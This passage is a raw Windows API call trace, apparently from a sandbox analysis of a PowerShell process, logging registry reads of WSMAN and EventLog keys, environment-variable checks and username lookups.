	[0164.728] RegQueryInfoKeyW (in: hKey=0x34c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14e41c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14e420, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14e41c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14e420*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0164.730] RegEnumValueW (in: hKey=0x34c, dwIndex=0x0, lpValueName=0x721bd8, lpcchValueName=0x14e444, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x14e444, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0164.730] RegEnumValueW (in: hKey=0x34c, dwIndex=0x1, lpValueName=0x721bd8, lpcchValueName=0x14e444, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x14e444, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0164.730] RegQueryValueExW (in: hKey=0x34c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14e424, lpData=0x0, lpcbData=0x14e420*=0x0 | out: lpType=0x14e424*=0x1, lpData=0x0, lpcbData=0x14e420*=0x8) returned 0x0
	[0164.731] RegQueryValueExW (in: hKey=0x34c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14e424, lpData=0x721bd8, lpcbData=0x14e420*=0x8 | out: lpType=0x14e424*=0x1, lpData="2.0", lpcbData=0x14e420*=0x8) returned 0x0
	[0165.410] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e388 | out: phkResult=0x14e388*=0x300) returned 0x0
	[0165.410] RegQueryInfoKeyW (in: hKey=0x300, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14e3d8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14e3dc, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14e3d8*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14e3dc*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0165.410] RegEnumValueW (in: hKey=0x300, dwIndex=0x0, lpValueName=0x721bd8, lpcchValueName=0x14e400, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x14e400, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0165.410] RegEnumValueW (in: hKey=0x300, dwIndex=0x1, lpValueName=0x721bd8, lpcchValueName=0x14e400, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x14e400, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0165.411] RegQueryValueExW (in: hKey=0x300, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14e3e0, lpData=0x0, lpcbData=0x14e3dc*=0x0 | out: lpType=0x14e3e0*=0x1, lpData=0x0, lpcbData=0x14e3dc*=0x8) returned 0x0
	[0165.411] RegQueryValueExW (in: hKey=0x300, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14e3e0, lpData=0x721bd8, lpcbData=0x14e3dc*=0x8 | out: lpType=0x14e3e0*=0x1, lpData="2.0", lpcbData=0x14e3dc*=0x8) returned 0x0
	[0165.413] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0165.413] GetLastError () returned 0xcb
	[0165.417] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0165.417] GetLastError () returned 0xcb
	[0166.188] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e348 | out: phkResult=0x14e348*=0x320) returned 0x0
	[0166.188] RegQueryInfoKeyW (in: hKey=0x320, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14e3b0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14e3ac, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14e3b0*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14e3ac*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0166.189] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x0, lpName=0x721bd8, lpcchName=0x14e3cc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14e3cc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0166.190] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x1, lpName=0x721bd8, lpcchName=0x14e3cc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14e3cc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0166.190] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x2, lpName=0x721bd8, lpcchName=0x14e3cc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14e3cc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0166.190] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x3, lpName=0x721bd8, lpcchName=0x14e3cc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14e3cc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0166.190] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x4, lpName=0x721bd8, lpcchName=0x14e3cc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14e3cc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0166.191] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x5, lpName=0x721bd8, lpcchName=0x14e3cc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14e3cc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0166.191] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x6, lpName=0x721bd8, lpcchName=0x14e3cc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14e3cc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0166.191] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x7, lpName=0x721bd8, lpcchName=0x14e3cc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14e3cc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0166.191] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x8, lpName=0x721bd8, lpcchName=0x14e3cc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14e3cc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0166.192] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e378 | out: phkResult=0x14e378*=0x324) returned 0x0
	[0166.192] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e378 | out: phkResult=0x14e378*=0x0) returned 0x2
	[0166.192] RegOpenKeyExW (in: hKey=0x320, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e378 | out: phkResult=0x14e378*=0x328) returned 0x0
	[0166.192] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e378 | out: phkResult=0x14e378*=0x0) returned 0x2
	[0166.193] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e378 | out: phkResult=0x14e378*=0x344) returned 0x0
	[0166.193] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e378 | out: phkResult=0x14e378*=0x0) returned 0x2
	[0166.193] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e378 | out: phkResult=0x14e378*=0x350) returned 0x0
	[0166.193] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e378 | out: phkResult=0x14e378*=0x0) returned 0x2
	[0166.194] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e378 | out: phkResult=0x14e378*=0x354) returned 0x0
	[0166.194] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e378 | out: phkResult=0x14e378*=0x0) returned 0x2
	[0166.194] RegOpenKeyExW (in: hKey=0x320, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e378 | out: phkResult=0x14e378*=0x358) returned 0x0
	[0166.194] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e378 | out: phkResult=0x14e378*=0x0) returned 0x2
	[0166.195] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e378 | out: phkResult=0x14e378*=0x35c) returned 0x0
	[0166.195] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e378 | out: phkResult=0x14e378*=0x0) returned 0x2
	[0166.195] RegOpenKeyExW (in: hKey=0x320, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e378 | out: phkResult=0x14e378*=0x360) returned 0x0
	[0166.195] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e378 | out: phkResult=0x14e378*=0x0) returned 0x2
	[0166.196] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e378 | out: phkResult=0x14e378*=0x364) returned 0x0
	[0166.196] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e378 | out: phkResult=0x14e378*=0x368) returned 0x0
	[0166.196] RegCloseKey (hKey=0x368) returned 0x0
	[0166.196] RegCloseKey (hKey=0x320) returned 0x0
	[0166.197] RegCloseKey (hKey=0x364) returned 0x0
	[0166.565] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x722398, nSize=0x14e4c4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14e4c4) returned 0x1
	[0166.566] GetLastError () returned 0x3
	[0166.568] GetUserNameW (in: lpBuffer=0x721bd8, pcbBuffer=0x14e4cc | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14e4cc) returned 1
	[0167.656] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e32c | out: phkResult=0x14e32c*=0x320) returned 0x0
	[0167.656] RegQueryInfoKeyW (in: hKey=0x320, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14e394, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14e390, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14e394*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14e390*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.656] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x0, lpName=0x721bd8, lpcchName=0x14e3b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14e3b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.656] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x1, lpName=0x721bd8, lpcchName=0x14e3b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14e3b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.656] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x2, lpName=0x721bd8, lpcchName=0x14e3b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14e3b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.656] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x3, lpName=0x721bd8, lpcchName=0x14e3b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14e3b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.656] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x4, lpName=0x721bd8, lpcchName=0x14e3b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14e3b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.657] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x5, lpName=0x721bd8, lpcchName=0x14e3b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14e3b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.657] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x6, lpName=0x721bd8, lpcchName=0x14e3b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14e3b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.657] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x7, lpName=0x721bd8, lpcchName=0x14e3b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14e3b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.657] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x8, lpName=0x721bd8, lpcchName=0x14e3b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14e3b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.657] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e35c | out: phkResult=0x14e35c*=0x368) returned 0x0
	[0167.657] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e35c | out: phkResult=0x14e35c*=0x0) returned 0x2
	[0167.657] RegOpenKeyExW (in: hKey=0x320, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e35c | out: phkResult=0x14e35c*=0x36c) returned 0x0
	[0167.658] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e35c | out: phkResult=0x14e35c*=0x0) returned 0x2
	[0167.658] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e35c | out: phkResult=0x14e35c*=0x370) returned 0x0
	[0167.658] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e35c | out: phkResult=0x14e35c*=0x0) returned 0x2
	[0167.658] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e35c | out: phkResult=0x14e35c*=0x374) returned 0x0
	[0167.658] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e35c | out: phkResult=0x14e35c*=0x0) returned 0x2
	[0167.658] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e35c | out: phkResult=0x14e35c*=0x378) returned 0x0
	[0167.659] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e35c | out: phkResult=0x14e35c*=0x0) returned 0x2
	[0167.659] RegOpenKeyExW (in: hKey=0x320, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e35c | out: phkResult=0x14e35c*=0x37c) returned 0x0
	[0167.659] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e35c | out: phkResult=0x14e35c*=0x0) returned 0x2
	[0167.659] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e35c | out: phkResult=0x14e35c*=0x380) returned 0x0
	[0167.659] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e35c | out: phkResult=0x14e35c*=0x0) returned 0x2
	[0167.660] RegOpenKeyExW (in: hKey=0x320, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e35c | out: phkResult=0x14e35c*=0x384) returned 0x0
	[0167.660] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e35c | out: phkResult=0x14e35c*=0x0) returned 0x2
	[0167.660] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e35c | out: phkResult=0x14e35c*=0x388) returned 0x0
	[0167.660] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e35c | out: phkResult=0x14e35c*=0x38c) returned 0x0
	[0167.660] RegCloseKey (hKey=0x38c) returned 0x0
	[0167.660] RegCloseKey (hKey=0x320) returned 0x0
	[0167.661] RegCloseKey (hKey=0x388) returned 0x0
	[0167.661] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e32c | out: phkResult=0x14e32c*=0x388) returned 0x0
	[0167.661] RegQueryInfoKeyW (in: hKey=0x388, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14e394, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14e390, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14e394*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14e390*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.661] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x0, lpName=0x721bd8, lpcchName=0x14e3b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14e3b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.661] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x1, lpName=0x721bd8, lpcchName=0x14e3b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14e3b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.661] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x2, lpName=0x721bd8, lpcchName=0x14e3b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14e3b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.661] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x3, lpName=0x721bd8, lpcchName=0x14e3b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14e3b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.661] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x4, lpName=0x721bd8, lpcchName=0x14e3b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14e3b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.661] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x5, lpName=0x721bd8, lpcchName=0x14e3b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14e3b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.661] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x6, lpName=0x721bd8, lpcchName=0x14e3b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14e3b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.662] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x7, lpName=0x721bd8, lpcchName=0x14e3b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14e3b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.662] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x8, lpName=0x721bd8, lpcchName=0x14e3b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14e3b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.662] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e35c | out: phkResult=0x14e35c*=0x320) returned 0x0
	[0167.662] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e35c | out: phkResult=0x14e35c*=0x0) returned 0x2
	[0167.662] RegOpenKeyExW (in: hKey=0x388, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e35c | out: phkResult=0x14e35c*=0x38c) returned 0x0
	[0167.662] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e35c | out: phkResult=0x14e35c*=0x0) returned 0x2
	[0167.662] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e35c | out: phkResult=0x14e35c*=0x390) returned 0x0
	[0167.662] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e35c | out: phkResult=0x14e35c*=0x0) returned 0x2
	[0167.663] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e35c | out: phkResult=0x14e35c*=0x394) returned 0x0
	[0167.663] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e35c | out: phkResult=0x14e35c*=0x0) returned 0x2
	[0167.663] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e35c | out: phkResult=0x14e35c*=0x398) returned 0x0
	[0167.663] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e35c | out: phkResult=0x14e35c*=0x0) returned 0x2
	[0167.663] RegOpenKeyExW (in: hKey=0x388, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e35c | out: phkResult=0x14e35c*=0x39c) returned 0x0
	[0167.663] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e35c | out: phkResult=0x14e35c*=0x0) returned 0x2
	[0167.663] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e35c | out: phkResult=0x14e35c*=0x3a0) returned 0x0
	[0167.664] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e35c | out: phkResult=0x14e35c*=0x0) returned 0x2
	[0167.664] RegOpenKeyExW (in: hKey=0x388, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e35c | out: phkResult=0x14e35c*=0x3a4) returned 0x0
	[0167.664] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e35c | out: phkResult=0x14e35c*=0x0) returned 0x2
	[0167.664] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e35c | out: phkResult=0x14e35c*=0x3a8) returned 0x0
	[0167.664] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e35c | out: phkResult=0x14e35c*=0x3ac) returned 0x0
	[0167.664] RegCloseKey (hKey=0x3ac) returned 0x0
	[0167.664] RegCloseKey (hKey=0x388) returned 0x0
	[0167.664] RegCloseKey (hKey=0x3a8) returned 0x0
	[0167.665] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e320 | out: phkResult=0x14e320*=0x3a8) returned 0x0
	[0167.665] RegQueryInfoKeyW (in: hKey=0x3a8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14e388, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14e384, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14e388*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14e384*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.665] RegEnumKeyExW (in: hKey=0x3a8, dwIndex=0x0, lpName=0x721bd8, lpcchName=0x14e3a4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14e3a4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
